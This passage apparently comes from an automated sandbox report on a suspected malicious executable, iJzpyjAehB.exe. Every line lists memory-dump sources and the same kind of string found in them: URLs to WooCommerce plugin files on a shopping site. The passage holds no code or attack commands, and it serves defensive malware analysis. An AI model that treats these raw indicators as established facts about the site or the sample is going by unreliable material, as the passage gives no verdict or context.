00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.jquery.min.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/chosen/chosen.min.css?ver
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/front.js?ver=1.3.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-currency-switcher/js/price-slider_33.js?ver=1.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/style.css?ver=3.1.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/css/toggle-switch.css?ver=3.1.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-deposits/assets/js/add-to-cart.js?ver=3.1.7
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce-pdf-catalog/public/css/woocommerce-pdf-catalog
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=5.5.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.5.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-touc
